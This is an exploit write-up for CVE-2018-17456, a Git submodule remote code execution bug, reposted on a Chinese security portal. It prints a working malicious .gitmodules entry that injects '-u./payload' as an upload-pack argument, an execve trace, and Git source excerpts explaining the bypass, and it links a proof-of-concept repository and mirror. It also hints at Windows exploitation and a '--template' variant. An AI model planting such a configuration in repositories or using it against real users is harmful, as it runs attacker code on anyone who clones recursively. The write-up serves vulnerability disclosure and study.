首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Git Submodule Arbitrary Code Execution
来源:https://github.com/joernchen 作者:joernchen 发布时间:2018-10-18  
# CVE-2018-17456
 
I've gotten a couple of questions about exploitation for the
[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we
go with some technical details.
 
## TL;DR
 
[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.
EDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip
 
## Exploitation
 
The `.gitmodules` file looks as follows:
 
```
[submodule "x:x"]
    path = x:x
    url = -u./payload
```
 
The actual command being injected is set by the url, `-u./payload`
points the `upload-pack` flag of git clone to the `payload` shell
script. Note also the `:` within the path, this part is needed to
actually get the `payload` script executed.
 
The path will end up as the repository URL in the subsequent `clone`
operation:
 
```
execve("/usr/lib/git-core/git", ["/usr/lib/git-core/git", "clone",
"--no-checkout", "--progress", "--separate-git-dir",
"/tmp/huhu/.git/modules/x:x", "-u./payload", "/tmp/huhu/x:x"],...
```
 
As the actual URL from `.gitmodules` is interpreted as the `-u`
argument.
 
The colon is due to the fact, that the colon character let us go past
those lines in `transport.c`:
 
```c
    } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {
        struct bundle_transport_data *data = xcalloc(1, sizeof(*data));
        transport_check_allowed("file");
        ret->data = data;
        ret->vtable = &bundle_vtable;
        ret->smart_options = NULL;
```
 
Due to `url_is_local_not_ssh` will return false due to the colon
in the path. And therefore later on in the code the smart_options
containing the `uploadpack` setting are still in place:
 
```c
   } else {
        /* Unknown protocol in URL. Pass to external handler. */
        int len = external_specification_len(url);
        char *handler = xmemdupz(url, len);
        transport_helper_init(ret, handler);
    }
 
    if (ret->smart_options) {
        ret->smart_options->thin = 1;
        ret->smart_options->uploadpack = "git-upload-pack";
        if (remote->uploadpack)
            ret->smart_options->uploadpack = remote->uploadpack;
        ret->smart_options->receivepack = "git-receive-pack";1
        if (remote->receivepack)
            ret->smart_options->receivepack = remote->receivepack;
    }
```
 
## Further hints
 
The constraint to have a colon in the `path` seems to hinder exploitation on Windows
as a colon is a forbidden character within a path on Windows. However as noted by
some people during the disclosure: Git running within the Windows Subsystem for Linux or
cygwin will allow exploitation on Windows hosts.
 
Etienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
earlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Any Sound Recorder 2.93 Buffer
·libSSH - Authentication Bypass
·Academic Timetable Final Build
·FLIR Brickstream 3D+ - RTSP St
·FLIR AX8 Thermal Camera 1.32.1
·Snes9K 0.0.9z - Buffer Overflo
·Solaris RSH Stack Clash Privil
·NoMachine 5.3.26 Remote Code E
·FluxBB < 1.5.6 - SQL Injection
·Phoenix Contact WebVisit 29857
·Phoenix Contact WebVisit 6.40.
·Microsoft SQL Server Managemen
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved